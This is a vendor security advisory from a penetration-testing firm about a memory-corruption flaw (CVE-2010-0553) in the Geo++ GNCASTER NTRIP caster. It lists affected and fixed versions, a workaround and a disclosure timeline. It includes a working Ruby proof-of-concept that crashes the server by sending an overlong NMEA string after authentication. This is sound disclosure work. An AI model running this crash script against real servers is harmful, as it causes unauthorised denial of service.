Kontakt

Kontaktieren Sie uns gerne

+49 241 510081-0
kontakt@redteam-pentesting.de
Kontaktformular
RedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting Header

Geo++(R) GNCASTER: Insecure handling of NMEA-data

During a penetration test, RedTeam Pentesting discovered that the GNCaster software does not handle NMEA-data correctly. An attacker that has valid login credentials can use this to crash the server software or potentially execute code on the server.

Details

  • Product: Geo++(R) GNCASTER
  • Affected Versions: <= 1.4.0.7
  • Fixed Versions: 1.4.0.8
  • Vulnerability Type: Memory corruption
  • Security Risk: medium
  • Vendor URL: http://www.geopp.de
  • Vendor Status: notified
  • Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2010-002
  • Advisory Status: published
  • CVE: CVE-2010-0553
  • CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0553

Introduction

“Geo++(R) GNCASTER is the Geo++ implementation of a NTRIP caster. NTRIP is a protocol within RTCM to provide GNSS information via Internet.”

(from the vendor’s homepage)

More Details

After logging in, the GNCaster server software allows the user to receive data streams. For some of these streams the user can send so-called NMEA-data to the server to specify the user’s geographical position. If an attacker sends a long data string, the server software crashes. RedTeam Pentesting believes it is also possible to exploit this vulnerability to execute code on the server.

Proof of Concept

The following ruby script can be used to crash the GNCaster server:

#!/usr/bin/env ruby
######################################
###                                    #
###  RedTeam Pentesting GmbH           #
###  kontakt@redteam-pentesting.de     #
###  https://www.redteam-pentesting.de  #
###                                    #
######################################

require 'socket'
require 'base64'

if ARGV.length < 3 then
    puts "USAGE: %s host:port user:password stream" % __FILE__
    puts "Example: %s 127.0.0.1:2101 testuser:secret /0001" % __FILE__
    puts
    exit
end

host, port = ARGV[0].split(':')
pw, stream = ARGV[1..2]

begin
    puts "requesting stream %s" % stream.inspect
    sock = TCPSocket.new(host, port.to_i)
    sock.write("GET %s HTTP/1.1\r\n" % stream)
    sock.write("Authorization: Basic %s\r\n" % Base64.encode64(pw).strip)
    sock.write("\r\n")

    response = sock.readline

    puts "server response: %s" % response.inspect

    puts "sending modified nmea data"
    sock.write("$GP" + "A" * 2000 +
        "GGA,134047.00,5005.40000000,N,00839.60000000," +
        "E,1,05,0.19,+00400,M,47.950,M,,*69\r\n")
    puts "done"
end

Workaround

A vulnerable server could be protected from this vulnerability by an application layer firewall that filters overly long NMEA-data.

Fix

Update GNCASTER to version 1.4.0.8.

Security Risk

As an attacker needs valid user credentials for this attack, the risk of this vulnerability is regarded as medium. If streams that use NMEA-data are publicly available, the risk should be considered as high.

History

  • 2009-07-07 Vulnerability identified during a penetration test
  • 2009-07-14 Meeting with customer
  • 2009-12-01 Vendor releases fixed version
  • 2010-01-27 Advisory released
  • 2011-09-07 CVE information added

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de.